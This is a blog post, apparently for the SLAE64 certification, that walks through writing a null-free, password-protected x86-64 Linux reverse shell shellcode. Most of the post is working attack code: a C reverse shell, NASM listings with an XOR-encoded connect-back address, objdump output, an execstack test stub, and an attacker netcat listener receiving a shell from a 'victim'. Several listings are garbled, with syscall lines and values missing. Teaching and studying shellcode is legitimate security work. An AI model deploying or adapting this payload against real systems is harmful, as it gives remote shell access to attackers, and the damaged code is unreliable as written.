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Assignment #2 – Reverse shell with password

The objective of this assignment was to create a shellcode that connects back to a certain IP and port and, if provided with the correct password, spawns a shell. The final shellcode must not have any null bytes.

Writing the reverse shell

I started by writing the reverse shell itself, with no password. To do this it's easier to start from a C version like the one below. This code has no error checking at all; and the shellcode won't have either.

#include <stdlib.h>
#include <unistd.h>
#include <strings.h>
#include <arpa/inet.h>

int main(int argc, char **argv)
    struct sockaddr_in server;
    int sock;
    char *arguments[] = {"/bin/sh", 0};
    sock = socket(AF_INET, SOCK_STREAM, 0);
    server.sin_family = AF_INET;
    server.sin_port = htons(atoi(argv[1]));
    server.sin_addr.s_addr = inet_addr("");
    bzero(&server.sin_zero, 8);
    connect(sock, (struct sockaddr *)&server, sizeof(server));

    dup2(sock, 0);
    dup2(sock, 1);
    dup2(sock, 2);

    execve(arguments[0], arguments, NULL);

Breaking it down we have seven parts:

  1. socket(). Create a socket to use in communications
  2. connect(). Connect the socket to an address and port
  3. dup2(). Duplicate file descriptors to connect stdin, stdout and stderr to the incoming connection
  4. execve(). Replace the current process image with /bin/sh

With the C code as reference each of these parts was implemented in assembly as follows.


You need to call socket(2) with the appropriate arguments. To figure out the values of the macros AF_INET and SOCK_STREAM you can use Python:

$ python3
>>> import socket
>>> socket.AF_INET
<AddressFamily.AF_INET: 2>
>>> socket.SOCK_STREAM
<SocketKind.SOCK_STREAM: 1>

The numbers for syscalls can be found in /usr/include/asm/unistd_64.h. From that file we know socket corresponds to syscall 41.

#define __NR_socket 41
#define __NR_connect 42
#define __NR_accept 43

You prepare to execute a syscall by putting its number in RAX and its arguments in RDI, RSI, RDX, R10, R8, R9, in that order. Lastly, you execute the syscall with the syscall instruction. The return value of the syscall is stored in RAX. With all this information we are able to write the following code.

; sock = socket(AF_INET, SOCK_STREAM, 0)
; AF_INET = 2
; __NR_socket = 41

mov rax, 41
mov rdi, 2
mov rsi, 1
mov rdx, 0

mov rdi, rax

The return value is moved to RDI for later use as an argument for other syscalls.


Calling connect(2) is probably the part of this shellcode most prone to confusion. The first argument is the ID (know as "file descriptor") of the socket created by socket.

The second argument is a pointer to a structure of the type sockaddr_in. So you need to create this structure in memory and then get a pointer to it. To understand this structure Beej's Guide to Network Programming is a valuable resource. We see sockaddr_in is declared as follows:

struct sockaddr_in {
    short            sin_family;
    unsigned short   sin_port;
    struct in_addr   sin_addr;
    char             sin_zero[8];

This definition lets you know the memory layout for the structure. sin_family and sin_port are short which corresponds to 2 bytes. sin_addr is a struct in_addr which from Beej's Guide you can see corresponds to a long, i.e. 4 bytes. And lastly sin_zero is an 8-char array, or 8 bytes in total. So the memory layout of sockaddr_in in the stack can be represented as follows:

  0         1   2         3   4                       7
| sin_family  |  sin_port   |         sin_addr          |    ↑ lower addresses
+------+------+------+------+------+------+------+------+    |  stack
|                       sin_zero                        |    | higher addresses

Since the stack grows from higher to lower addresses, the structure members are pushed onto the stack in reverse order from the one they appear in the declaration: sin_zero, then sin_addr, sin_port and lastly sin_family.

In the C code you can see the port to bind to is passed to htons(). On x86(-64) this function basically swaps the two bytes of the port number. So if you pass 0x0d3d to htons() it would return 0x3d0d on such a system. Why is this needed? Because the endianness of the processor (little-endian) is not the same as that used by the network (big-endian). So you have to reverse the bytes of port numbers (and IP addresses) so that the network understands you. And that is precisely what htons() or "host-to-network-short" does. You can use Python to do these conversions:

$ python3
>>> import socket
>>> hex(socket.htons(4444))

At last, the third argument to the bind syscall is the size of the address structure, which as seen in the memory diagram above is 16 bytes.

; server.sin_family = AF_INET;    short
; server.sin_port = htons(4444);    unsigned short
; server.sin_addr.s_addr = inet_addr("");    unsigned long
; bzero(&server.sin_zero, 8);
; AF_INET = 2
; connect(sock, (struct sockaddr *)&server, sockaddr_len)
; __NR_connect = 42

xor rax, rax
push rax          ; bzero()
mov dword [rsp-4], 0x0100007f
sub rsp, 4
push word 0x5c11  ; htons(4444)
push word 2

; connect
mov rax, 42
mov rsi, rsp
mov rdx, 16  ; sizeof(sockaddr_in)


These dup(2) syscalls will make sure all keystrokes arriving through the connection are passed to the process that will be spawned (/bin/sh) and that its output and errors goes back into the connection.

; dup2(sock, 0);
; dup2(sock, 1);
; dup2(sock, 2);
; __NR_dup2 = 33

mov rax, 33
mov rdi, rbx
xor rsi, rsi

mov rax, 33
inc rsi

mov rax, 33
inc rsi


The shell is spawned by this part of the shellcode. I decided to use the execve stack method, which consists in calling execve(2) after pushing its arguments to the stack.

; int execve(const char *path, char *const argv[], char *const envp[])
; rdi, path = (char*) /bin//sh, 0x00 (double slash for padding)
; rsi, argv = (char**) (/bin//sh, 0x00)
; rdx, envp = &0x00

xor rax, rax
push rax
mov rdx, rsp ; *rdx = &0x00

mov rsi, 0x68732f2f6e69622f
push rsi
mov rdi, rsp ; rdi = (char*) /bin//sh

push rax
push rdi
mov rsi, rsp ; rsi = (char**) (/bin//sh, 0x00)

mov al, 59

We now have a TCP reverse shell. Next we're going to password protect it.

Adding a password

To password protect the shell we need to do two things:

  1. define a password
  2. read a password from the user
  3. compare it with the correct password

If the password is correct the shellcode spawns a shell, otherwise it quits. I defined a few objectives for this shellcode that were not specified in the assignment:

  • I wanted the password to be of any size up to at least 16 bytes
  • and that it would be trivial to change the password, no special knowledge needed

Define the password

Just define the bytes (db) of the password. It will also come in handy to know the size of the password. You could hardcode it, but instead I defined a byte that will have the result of $-password, i.e. subtract the address of the current line ($) to that of the password label, which gives us the length of the password.

This definition will allow to change the shellcode's password trivially by changing the first line.

password: db "pass"
pass_len: db $-password

Read the password

We need to read input from the user. How do we do this? We use the read(2) syscall. We need to pass it which file descriptor to read from, the address where to read to, and how many bytes to read. The file description we want will be the one that was returned by accept, so that the password is read from the TCP connection. However, I started by reading from stdin, which corresponds to file descriptor 0 (from man stdin). This way I was able to test the password part of the code separately from the network part, to ease testing.

I picked the read size as 16, so the shellcode will work correctly with passwords up to 16 bytes. To increase this limit all that needs to be done is changing 16 to a greater value.

; read(int fd, void *buf, size_t count)

mov rax, 0
mov rdi, 0    ; fd
sub rsp, 16   ; create space for "buf" in the stack
mov rsi, rsp  ; rsi = *buf
mov rdx, 16

Compare the passwords

To compare the passwords we have to compare the value in the memory written to by read with the bytes defined in the password label. Quick question: how many bytes do we need to compare?

  1. The number returned by read ("On success, the number of bytes read is returned")
  2. As many as the length of password

Which did you pick? Picking the wrong one would result in a trivial authentication bypass ;) Answer below.

To compare the passwords you could write a loop. Instead, I chose to leverage the repz instruction combined with cmpsb. repz repeats an instruction while RCX is not zero and ZF is set, decrementing RCX after each repetition; while cmpsb compares the byte at the address in RSI with the one at the address in RDI, updates the flags register and increments/decrements RSI and RDI according to the direction flag (DF).

The result is that repz will stop repeating when the length to compare (in RCX) reaches 0 or a byte of the passwords does not match. To know which happened we can check the ZF flag: if it's not set it means repz ended because of a non-matching byte and the password is wrong. In that case we call exit. Otherwise the password is correct and we spawn the shell.

    xor rcx, rcx
    mov cl, [rel pass_len]
    lea rdi, [rel password]
    repz cmpsb
    jne exit

    ; spawn the shell

    mov rax, 60

Answer: you should pick the second option.

Complete shellcode

At this point we have a complete shellcode for a password-protected TCP reverse shell! Yay! But if you assemble this shellcode you will see it's full of null bytes (see below). We'll take care of that in the next section.

Regarding the shellcode size right now we have 211 bytes. This can be improved.

$ objdump -d reverse-shell-pass.o | grep -P ":\t" | cut -f2 | tr -d ' \n' | sed -e 's/../\\x&/g' | grep -o x | tr -d '\n' | wc -c

Unoptimised shellcode:

global _start

    jmp real_start
    password: db "pass"
    pass_len: db $-password

    ; sock = socket(AF_INET, SOCK_STREAM, 0)
    ; AF_INET = 2
    ; SOCK_STREAM = 1
    ; __NR_socket = 41

    mov rax, 41
    mov rdi, 2
    mov rsi, 1
    mov rdx, 0

    mov rdi, rax

    ; server.sin_family = AF_INET;    short
    ; server.sin_port = htons(4444);    unsigned short
    ; server.sin_addr.s_addr = inet_addr("");    unsigned long
    ; bzero(&server.sin_zero, 8);
    ; AF_INET = 2
    ; struct sockaddr_in {
    ;     short            sin_family;
    ;     unsigned short   sin_port;
    ;     struct in_addr   sin_addr;
    ;     char             sin_zero[8];
    ; };
    ; connect(sock, (struct sockaddr *)&server, sockaddr_len)
    ; __NR_connect = 42

    xor rax, rax
    push rax          ; bzero()
    mov dword [rsp-4], 0x0100007f
    sub rsp, 4
    push word 0x5c11  ; htons(4444)
    push word 2

    ; connect
    mov rax, 42
    mov rsi, rsp
    mov rdx, 16  ; sizeof(sockaddr_in)

    ; dup2(sock, 0);
    ; dup2(sock, 1);
    ; dup2(sock, 2);
    ; __NR_dup2 = 33

    mov rax, 33
    xor rsi, rsi

    mov rax, 33
    inc rsi

    mov rax, 33
    inc rsi

    ; read(int fd, void *buf, size_t count)
    ; On success, the number of bytes read is returned

    xor eax, eax
    ;rdi = "sock"  ; already done
    push rax
    push rax       ; create space for "buf" in the stack
    push rsp
    pop rsi        ; rsi = *buf
    mov dl, 16

    xor ecx, ecx
    mov cl, [rel pass_len]
    lea rdi, [rel password]
    repz cmpsb
    jne exit

    ; int execve(const char *path, char *const argv[], char *const envp[])
    ; rdi, path = (char*) /bin//sh, 0x00 (double slash for padding)
    ; rsi, argv = (char**) (/bin//sh, 0x00)
    ; rdx, envp = &0x00

    xor rax, rax
    push rax
    mov rdx, rsp ; *rdx = &0x00

    mov rsi, 0x68732f2f6e69622f
    push rsi
    mov rdi, rsp ; rdi = (char*) /bin//sh

    push rax
    push rdi
    mov rsi, rsp ; rsi = (char**) (/bin//sh, 0x00)

    mov al, 59

    ;xor eax, eax  ; upper bytes are zero after read
    mov al, 60

Shellcode disassembly revealing nulls:

$ nasm -felf64 reverse-shell-pass.nasm
$ objdump -M intel -d reverse-shell-pass.o

reverse-shell-pass.o:     file format elf64-x86-64

Disassembly of section .text:

0000000000000000 <_start>:
   0:	eb 05                	jmp    7 <real_start>

0000000000000002 <password>:
   2:	70 61                	jo     65 <read_password+0x1>
   4:	73 73                	jae    79 <compare_password+0xb>

0000000000000006 <pass_len>:
   6:	04                   	.byte 0x4

0000000000000007 <real_start>:
   7:	b8 29 00 00 00       	mov    eax,0x29
   c:	bf 02 00 00 00       	mov    edi,0x2
  11:	be 01 00 00 00       	mov    esi,0x1
  16:	ba 00 00 00 00       	mov    edx,0x0
  1b:	0f 05                	syscall 
  1d:	48 89 c7             	mov    rdi,rax

0000000000000020 <connect>:
  20:	48 31 c0             	xor    rax,rax
  23:	50                   	push   rax
  24:	c7 44 24 fc 7f 00 00 	mov    DWORD PTR [rsp-0x4],0x100007f
  2b:	01 
  2c:	48 83 ec 04          	sub    rsp,0x4
  30:	66 68 11 5c          	pushw  0x5c11
  34:	66 6a 02             	pushw  0x2
  37:	b8 2a 00 00 00       	mov    eax,0x2a
  3c:	48 89 e6             	mov    rsi,rsp
  3f:	ba 10 00 00 00       	mov    edx,0x10
  44:	0f 05                	syscall 

0000000000000046 <dup2>:
  46:	b8 21 00 00 00       	mov    eax,0x21
  4b:	48 31 f6             	xor    rsi,rsi
  4e:	0f 05                	syscall 
  50:	b8 21 00 00 00       	mov    eax,0x21
  55:	48 ff c6             	inc    rsi
  58:	0f 05                	syscall 
  5a:	b8 21 00 00 00       	mov    eax,0x21
  5f:	48 ff c6             	inc    rsi
  62:	0f 05                	syscall 

0000000000000064 <read_password>:
  64:	31 c0                	xor    eax,eax
  66:	50                   	push   rax
  67:	50                   	push   rax
  68:	54                   	push   rsp
  69:	5e                   	pop    rsi
  6a:	b2 10                	mov    dl,0x10
  6c:	0f 05                	syscall 

000000000000006e <compare_password>:
  6e:	31 c9                	xor    ecx,ecx
  70:	8a 0d 90 ff ff ff    	mov    cl,BYTE PTR [rip+0xffffffffffffff90]        # 6 <pass_len>
  76:	48 8d 3d 85 ff ff ff 	lea    rdi,[rip+0xffffffffffffff85]        # 2 <password>
  7d:	fc                   	cld    
  7e:	f3 a6                	repz cmps BYTE PTR ds:[rsi],BYTE PTR es:[rdi]
  80:	75 1e                	jne    a0 <exit>

0000000000000082 <execve>:
  82:	48 31 c0             	xor    rax,rax
  85:	50                   	push   rax
  86:	48 89 e2             	mov    rdx,rsp
  89:	48 be 2f 62 69 6e 2f 	movabs rsi,0x68732f2f6e69622f
  90:	2f 73 68 
  93:	56                   	push   rsi
  94:	48 89 e7             	mov    rdi,rsp
  97:	50                   	push   rax
  98:	57                   	push   rdi
  99:	48 89 e6             	mov    rsi,rsp
  9c:	b0 3b                	mov    al,0x3b
  9e:	0f 05                	syscall 

00000000000000a0 <exit>:
  a0:	b0 3c                	mov    al,0x3c
  a2:	0f 05                	syscall 

Removing nulls

We're almost done. Now we want to remove nulls. From the objdump above you can see all null bytes are in mov instructions with immediate values. To remove these we can move/add to lower parts of the registers, instead of moving 64-bit values (whose higher bytes are nulls). But you need to make sure the higher part of the register is zeroed before (typically by xoring the register with itself).


mov rax, 41     ; b8 29 00 00 00

; can be rewritten as

xor rax, rax    ; 48 31 c0
mov al, 41      ; b0 29

Since the IP to connect to may include null bytes ( for example does) we also need a way to transform this IP in a way that there are no null bytes. This can be accomplished for example by xoring the IP with some other value which does not cointain null values either. With this in mind:

push 0x0100007f   ; sin_addr

; can be rewritten as

push 0x10ffff70   ; sin_addr (xored)
xor dword [rsp], 0x11ffff0f ; recover sin_addr

To verify this you can use python:

$ python3
>>> hex(0x10ffff70 ^ 0x11ffff0f)
>>> import ipaddress
>>> ipaddress.ip_address(0x10ffff70 ^ 0x11ffff0f)


Removing the null bytes reduced the shellcode size. But can we do better? Yes, we can.

To do this my process was to go through each part of the code and think about and try optimisations for each. It involved trial and error (assembling and disassembling) to understand which equivalent instructions could be used that were shorter. The Intel development manuals and/or this site are also useful. Below I'll explain my main optimisations.

xor self/mov imm vs push imm/pop

At the beginning of our shellcode we have no guarantee about the values in the registers. So to set RAX to 41, without nulls, we can do something as:

xor rax, rax
mov al, 41

48 31 c0
b0 29

This takes 5 bytes. However, the same can be accomplished by pushing the immediate value and popping to the 64-bit register, which ensures the upper bytes of the register will be overwritten.

push 41
pop rax

6a 29

As you can see we reduce 2 bytes for each of these substitutions.

xor r64, r64 vs xor r32, r32

Xoring registers to zero them is a common operation. Xoring 64-bit registers takes 3 bytes:

xor rax, rax

48 31 c0

However we can obtain the same effect by xoring only the lower 32 bits, which takes only 2 bytes.

xor eax, eax

31 c0

What will happen to the upper 32 bits, you may ask? When you write to the lower 32 bits of a register the upper 32 bits are reset so we're good for zeroing.

When in 64-bit mode, operand size determines the number of valid bits in the destination general-purpose register:

  • 64-bit operands generate a 64-bit result in the destination general-purpose register.
  • 32-bit operands generate a 32-bit result, zero-extended to a 64-bit result in the destination general-purpose register.
  • 8-bit and 16-bit operands generate an 8-bit or 16-bit result. The upper 56 bits or 48 bits (respectively) of the destination general-purpose register are not modified by the operation.

xor edx, edx vs cdq

This is very specific, but if you know that the 31st bit of RAX is zero and want to zero RDX you can use cdq. This instruction copies RAX's bit 31 to all bits of EDX, hence zeroing RDX. We save one byte.

xor edx, edx
31 d2


Reserving stack space

Reserving space on the stack involves adjusting RSP by subtracting the number of bytes to reserve. In some cases you might also need to initialise the reserved bytes. This was the case when preparing the structure for socket. We wanted to reserve 4 bytes for sin_addr and initialise them with the IP address. I wrote it like this:

xor eax, eax
mov dword [rsp-4], 0x0100007f
sub rsp, 4

31 c0
c7 44 24 fc 7f 00 00 01
48 83 ec 04

As you can see the mov took 8 bytes and sub took 4. Is there another instruction that can adjust RSP and write to the stack? Yes, push does that. So we can write the same as follows:

xor eax, eax
push 0x0100007f

31 c0
68 7f 00 00 01

So we are able to reduce those 12 bytes to just 5.

mov r64, r64 vs push r64/pop r64

Another common operation is to move values between 64-bit registers. The opcodes for these operations use 3 bytes:

mov rbx, rax

48 89 c3

As you may have noticed, pushing and popping 64-bit registers results in 1-byte opcodes. Therefore, we can rewrite 64-bit register moves a push followed by a pop:

push rax
pop rbx


We save 1 byte for each of these operations.

Take advantage of syscall return values

Syscall return values are placed in RAX. On success most syscalls return a non-negative integer. This come can in handy because it might help with the initialisations of RAX. For example to call dup2 we need rax=33. Normally we'd write for example:

xor rax, rax
mov al, 33

However, since before calling dup2 we call connect, which on success returns zero, we can drop the xor and save an instruction. Even if a syscall does not return zero, if it returns a small positive integer we know the upper bytes of RAX will be zeroed.

Pushing the password

In the password comparison part I used two relative addressing instructions:

xor ecx, ecx
mov cl, [rel pass_len]
lea rdi, [rel password]
repz cmpsb
jne exit

If we disassemble these instructions we see that unfortunately the relative offsets adds six 0xff:

8a 0d ae ff ff ff       mov    cl,BYTE PTR [rip+0xffffffffffffffae]   # 6 <pass_len>
48 8d 3d a3 ff ff ff    lea    rdi,[rip+0xffffffffffffffa3]           # 2 <password>

It would be nice to get rid of those 0xff. I could find no way to shorten the offset. But we could get rid of the offsets altogether by pushing the correct password and its length to the stack before we do the comparison.

push dword 0x73736170  ; password "pass"
push 4                 ; password length
pop rcx
push rsp
pop rdi        ; rdi = *password
repz cmpsb
jne exit

I tried this and after adjusting the code to this change 12 bytes were saved. However, I opted not to use this optimisation in the final shellcode. Why? Because I wanted the password to be trivial to change. Changing the password in the code above would require not only to calculate the new number to push but also to modify the instructions. Imagine you wanted to use "foobar" as the password instead: a single push of 4 bytes would no longer work, you'd have to add another push of 2 bytes. Oh, and don't forget to change the length of the password! Compare this with the ease of just typing in a new password.


We're done. The shellcode works, it has no nulls and we've shortened it. The final shellcode is at the end.

$ nasm -felf64 bind-shell-pass.nasm
$ objdump -d bind-shell-pass.o | grep -P ":\t" | cut -f2 | tr -d ' \n' | sed -e 's/../\\x&/g'

Let's put the shellcode in a C test stub:

#include <stdio.h>
#include <string.h>

char code[] =

int main() {
    printf("length: %lu\n", strlen(code));
    ((int(*)()) code)();

Compile it:

$ gcc -Wall -z execstack shellcode.c -o shellcode

On the attacker's machine open a port to listen at:

$ nc -vlp 4444 localhost

On the victim's machine execute the shellcode:

$ ./shellcode
length: 121

And finally the attacker will receive a connection they can use:

Connection from

As you can see removing the nulls and optimising reduced the size from 164 down to 121 bytes. A 26% cut.

That is all. Thank you for reading. Final shellcode below.

global _start

    jmp real_start
    password: db "pass"
    pass_len: db $-password

    ; sock = socket(AF_INET, SOCK_STREAM, 0)
    ; AF_INET = 2
    ; SOCK_STREAM = 1
    ; __NR_socket = 41
    ; On success, a file descriptor for the new socket is returned

    push 41
    pop rax
    push 2
    pop rdi
    push 1
    pop rsi
    cdq       ; copies rax's bit 31 to all bits of edx (zeroes rdx)

    push rax
    pop rdi

    ; server.sin_family = AF_INET;    short
    ; server.sin_port = htons(4444);    unsigned short
    ; server.sin_addr.s_addr = inet_addr("");    unsigned long
    ; bzero(&server.sin_zero, 8);
    ; struct sockaddr_in {
    ;     short            sin_family;
    ;     unsigned short   sin_port;
    ;     struct in_addr   sin_addr;
    ;     char             sin_zero[8];
    ; };
    ; connect(sock, (struct sockaddr *)&server, sockaddr_len)
    ; AF_INET = 2
    ; __NR_connect = 42
    ; On success, zero is returned

    xor eax, eax
    push rax          ; sin_zero
    push 0x10ffff70   ; sin_addr (xored)
    xor dword [rsp], 0x11ffff0f ; recover sin_addr
    push word 0x5c11  ; htons(4444)
    push word 2

    ; connect
    add al, 42
    push rsp
    pop rsi
    add dl, 16    ; sizeof(sockaddr_in)

    ; dup2(sock, 0);
    ; dup2(sock, 1);
    ; dup2(sock, 2);
    ; __NR_dup2 = 33
    ; On success, return the new file descriptor

    push 2
    pop rsi

    mov al, 33
    dec esi
    jns dup2_loop

    ; read(int fd, void *buf, size_t count)
    ; On success, the number of bytes read is returned

    ;xor eax, eax  ; already done by dup2
    ;rdi = "sock"  ; already done
    push rax
    push rax       ; create space for "buf" in the stack
    push rsp
    pop rsi        ; rsi = *buf
    mov dl, 16

    xor ecx, ecx
    mov cl, [rel pass_len]
    lea rdi, [rel password]
    repz cmpsb
    jne exit

    ; execve(const char *path, char *const argv[], char *const envp[])
    ; rdi, path = (char*) /bin//sh, 0x00 (double slash for padding)
    ; rsi, argv = (char**) (/bin//sh, 0x00)
    ; rdx, envp = &0x00

    xor eax, eax
    push rax
    push rsp
    pop rdx      ; *rdx = &0x00

    mov rsi, 0x68732f2f6e69622f
    push rsi
    push rsp
    pop rdi      ; rdi = (char*) /bin//sh

    push rax
    push rdi
    push rsp
    pop rsi      ; rsi = (char**) (/bin//sh, 0x00)

    mov al, 59

    ;xor eax, eax  ; upper bytes are zero after read
    mov al, 60

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification.

Student ID: SLAE64-1635